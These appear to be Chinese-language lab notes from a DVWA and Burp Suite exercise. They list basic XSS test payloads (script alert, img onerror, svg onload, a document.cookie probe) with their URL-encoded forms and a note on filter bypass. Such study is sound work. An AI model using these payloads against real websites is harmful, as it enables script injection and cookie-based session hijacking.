# XSS Payload 实验记录
# 实验环境：DVWA + Burp Suite
# 实验类型：Reflected XSS / Stored XSS / DOM XSS / Filter Bypass

==================================================
1. 基础 Reflected XSS
==================================================

<script>alert(1)</script>

作用：
测试输入内容是否会被页面当作 JavaScript 执行。

预期结果：
浏览器弹出数字 1。

说明：
这是最基础的 XSS Payload，用于验证页面是否存在脚本执行漏洞。

--------------------------------------------------

==================================================
2. HTML 注入测试
==================================================

<h1>test</h1>

作用：
测试用户输入是否会被浏览器当作 HTML 标签解析。

预期结果：
页面显示一个较大的 test 标题。

说明：
如果 HTML 标签被解析，说明页面没有正确转义用户输入。

--------------------------------------------------

==================================================
3. 图片事件型 XSS
==================================================

<img src=1 onerror=alert(1)>

作用：
利用 img 标签加载失败时触发 onerror 事件执行 JavaScript。

预期结果：
浏览器弹出数字 1。

说明：
该 Payload 可用于绕过只过滤 <script> 标签的简单过滤机制。

--------------------------------------------------

==================================================
4. Cookie 弹窗测试
==================================================

<img src=1 onerror=alert(document.cookie)>

作用：
测试是否可以读取当前页面 Cookie。

预期结果：
浏览器弹出当前站点 Cookie 信息。

说明：
真实攻击中可能被用于会话劫持测试，但本实验仅在本地 DVWA 靶场中进行。

--------------------------------------------------

==================================================
5. SVG 事件型 XSS
==================================================

<svg onload=alert(1)>

作用：
利用 SVG 标签加载时触发 onload 事件执行 JavaScript。

预期结果：
浏览器弹出数字 1。

说明：
这是常见的 XSS Filter Bypass Payload。

--------------------------------------------------

==================================================
6. DOM XSS Payload
==================================================

<script>alert(1)</script>

URL 编码形式：

%3Cscript%3Ealert%281%29%3C%2Fscript%3E

作用：
用于 DOM XSS 参数测试。

示例：

default=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

预期结果：
浏览器弹出数字 1。

--------------------------------------------------

==================================================
7. URL 编码 Payload 示例
==================================================

%3Cscript%3Ealert%281%29%3C%2Fscript%3E

%3Cimg+src%3D1+onerror%3Dalert%281%29%3E

%3Csvg+onload%3Dalert%281%29%3E

说明：
这些是浏览器或 Burp 抓包时看到的 URL 编码结果。

常见编码：

<  -> %3C
>  -> %3E
(  -> %28
)  -> %29
/  -> %2F
空格 -> + 或 %20

--------------------------------------------------